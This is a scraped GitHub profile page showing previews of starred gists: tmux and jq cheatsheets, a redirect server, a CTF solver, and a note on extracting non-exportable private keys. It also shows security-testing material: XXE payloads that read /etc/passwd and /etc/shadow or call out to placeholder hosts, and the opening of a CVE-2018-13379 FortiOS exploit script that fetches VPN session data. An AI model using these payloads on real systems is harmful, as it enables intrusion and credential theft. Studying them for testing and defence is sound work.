Skip to content

Instantly share code, notes, and snippets.

View ChOkO08's full-sized avatar

Rafael ChOkO ChOkO08

99 followers · 255 following
View GitHub Profile
@henrik
henrik / tmux_cheatsheet.markdown
Created March 3, 2012 19:47
tmux cheatsheet

tmux cheatsheet

As configured in my dotfiles.

start new:

tmux

start new with session name:

@derrickorama
derrickorama / make-cert-and-pk.md
Last active April 17, 2024 23:10
Extracting certs/private keys from certificates that disable private key exporting

Situation

  • I have to use a Windows client to install a certificate (say via the Magnum PKI Client)
  • I cannot export the private key for this certificate
  • I am a Linux user that needs to have the cert and private key

Solution (steps)

Install/export certificate using Windows VM

@staaldraad
staaldraad / XXE_payloads
Last active July 27, 2024 02:22
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@shreddd
shreddd / redirect.py
Created September 30, 2015 21:14
Simple Redirect Server in python to redirect requests to a specified URL
#!/usr/bin/env python
"""
Simple HTTP URL redirector
Shreyas Cholia 10/01/2015
usage: redirect.py [-h] [--port PORT] [--ip IP] redirect_url
HTTP redirect server
positional arguments:
@olih
olih / jq-cheetsheet.md
Last active July 16, 2024 23:02
jq Cheet Sheet

Processing JSON using jq

jq is useful to slice, filter, map and transform structured json data.

Installing jq

On Mac OS

brew install jq

@jh00nbr
jh00nbr / solver_we_also_have_memes.py
Last active February 1, 2024 04:21
Writeup - Challenge - We also have memes! - 3DS-CTF
from PIL import Image
import sys
# Team RTFM - Red Team Freakin' Maniacs - rtfm-ctf.org
# Writeup - We also have memes!- 3DS-CTF
#playing another CTFs, our team discovered an awesome algorithm to hid messages in a PNG file.
#One member of the team told that is possible to improve the algorithm to make it impossible to retrieve the original message directly. So he hiden a message on this meme and gave to us to solve.
#Prove the he's wrong!
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / Direct XXE Windows
Last active February 29, 2024 20:25
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
@trackscorer
trackscorer / XXE and OOB
Created November 15, 2018 09:02
<?xml version=”1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM “file:///etc/passwd”>]>
<data>&file;</data>
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]>
xxe.dtd:
@worldofprasanna
worldofprasanna / terminal-capture.md
Last active July 15, 2024 17:45
Multiple screen terminal capture using asciinema & tmux

Commands Reference

  1. Start a new tmux named session tmux new -s terminal-capture
  2. Split the screen using these commands,
  • vertical split <C-b>"
  • horizontal split <C-b>%
  1. To navigate between the panes,
  • To goto Left pane <C-b> left-key
  • To goto Right pane <C-b> right-key
  • To goto Top pane up-key
@code-machina
code-machina / CVE-2018-13379.py
Last active May 29, 2023 03:33
CVE-2018-13379 : A path traversal vulnerability in the FortiOS SSL VPN web portal
import requests, binascii, optparse
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
import multiprocessing
def checkIP(ip):
try:
url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"